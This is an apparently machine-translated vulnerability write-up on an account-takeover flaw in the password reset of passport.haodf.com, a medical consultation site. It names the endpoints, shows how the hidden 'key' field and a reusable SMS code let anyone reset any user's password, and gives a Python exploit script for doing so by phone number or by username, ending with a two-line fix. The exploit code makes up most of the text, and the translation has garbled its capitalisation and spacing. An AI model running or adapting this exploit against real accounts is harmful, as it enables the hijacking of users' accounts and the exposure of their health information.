Good doctor resets arbitrary users

1. Reset by mobile phone number
Http://passport.haodf.com/user/resetpassword

Use this URL to retrieve your password from your email address or mobile phone number.
When we select the mobile phone number to find the password, the webpage jumps to the following address and requires the user name and mobile phone verification code to be entered
Http://passport.haodf.com/user/sendpasswordsucc? Type = mobile & username = xxxxxxx

It can be seen that the user name will appear directly in the address bar of the webpage, and the verification code can be bypassed.
(BTW, mobile phone verification code can be used repeatedly, it seems that it will not expire For A Long Time)
View the webpage source code and find

<Input name = "key" type = "hidden" id = "key" value = "de4rxvqamcgxbc3umxqrxxxxxxnceno8igq8jhof0b"/>

This key is the key used to reset the password.

Then construct a post request with the address
Http://passport.haodf.com/user/confirmpassword

The data is
Password = 123123 & confirmPassword = 123123 & key = XXXXXX

You can reset the user password.

2. Reset by user name
The web site itself does not provide this function, but you can enter from the intermediate web site, you can reset the user name
Http://passport.haodf.com/user/sendpasswordsucc? Type = mobile & username = xxxxxxx

3. Reset through email
Similar to 1, resetting by mobile phone number


A simple EXP written in python
# Encoding = utf8
Username = 'init'

Class MyHTTPRedirectHandler (urllib2.HTTPRedirectHandler ):
Def http_error_302 (self, req, fp, code, msg, httpmsg ):
For header in httpmsg. headers:
If header. count ('username = ')> 0:
Global username
Username = header [header. index ('username = ') + 9: header. index (' \ r \ n')]
Return urllib2.HTTPRedirectHandler. http_error_302 (self, req, fp, code, msg, httpmsg)

Import urllib, urllib2, ConfigParser, time, winsound

Def ResetByPhone (phone ):
Resetpwd_url = 'HTTP: // passport.haodf.com/user/resetpassword'
Submit_url = 'HTTP: // passport.haodf.com/user/confirmpassword'

Req = urllib2.Request (resetpwd_url, 'input = % s' % phone)
Opener = urllib2.build _ opener (MyHTTPRedirectHandler)
Response = opener. open (req)
The_page = response. read ()
Key = the_page [the_page.index ('Id = "key" ') + 16:]
Key = key [: key. index ('"')]

Req = urllib2.Request (submit_url, 'password = % s & confirmPassword = % s & key = % s' % (phone, phone, key ))
Response = urllib2.urlopen (req)
# Print response. read ()

Def ResetByUsername (uname ):
Resetpwd_url = 'HTTP: // passport.haodf.com/user/sendpasswordsucc'
Submit_url = 'HTTP: // passport.haodf.com/user/confirmpassword'

Req = urllib2.Request (resetpwd_url, 'Type = mobile & username = % s' % uname)
Response = urllib2.urlopen (req)
The_page = response. read ()
Key = the_page [the_page.index ('Id = "key" ') + 16:]
Key = key [: key. index ('"')]

Req = urllib2.Request (submit_url, 'password = % s & confirmPassword = % s & key = % s' % (uname, uname, key ))
Response = urllib2.urlopen (req)
# Print response. read ()

ResetByPhone ('20140901 ')
ResetByUsername ('testuser ')

 

 
 

Solution:
Hide key
Set Verification Code invalidation Mechanism